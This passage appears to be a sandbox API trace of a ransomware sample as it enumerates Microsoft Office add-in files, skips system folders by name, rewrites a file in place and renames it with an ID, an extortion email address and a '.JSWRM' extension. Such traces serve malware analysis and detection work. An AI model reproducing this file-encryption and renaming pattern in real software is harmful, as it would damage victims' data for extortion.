[0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241038, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0126.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0126.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.364] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4516) returned 1 [0126.364] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11a0) returned 0x278330 [0126.364] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x11a0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x11a0, lpOverlapped=0x0) returned 1 [0126.366] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.366] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x11a0, lpOverlapped=0x0) returned 1 [0126.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.366] CloseHandle (hObject=0x338) returned 1 [0126.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0126.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0126.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0126.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0126.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0126.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\de\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\de\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0126.368] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51c07e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51c07e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51c07e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.368] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0126.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0126.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0126.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0126.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.369] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86cced8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86cced8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86cced8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d698, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0126.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.369] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf64139b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf64139b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6a7bf80, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.369] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.370] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bd443f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bd443f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bd443f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x201030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.370] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.371] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.371] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0126.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", 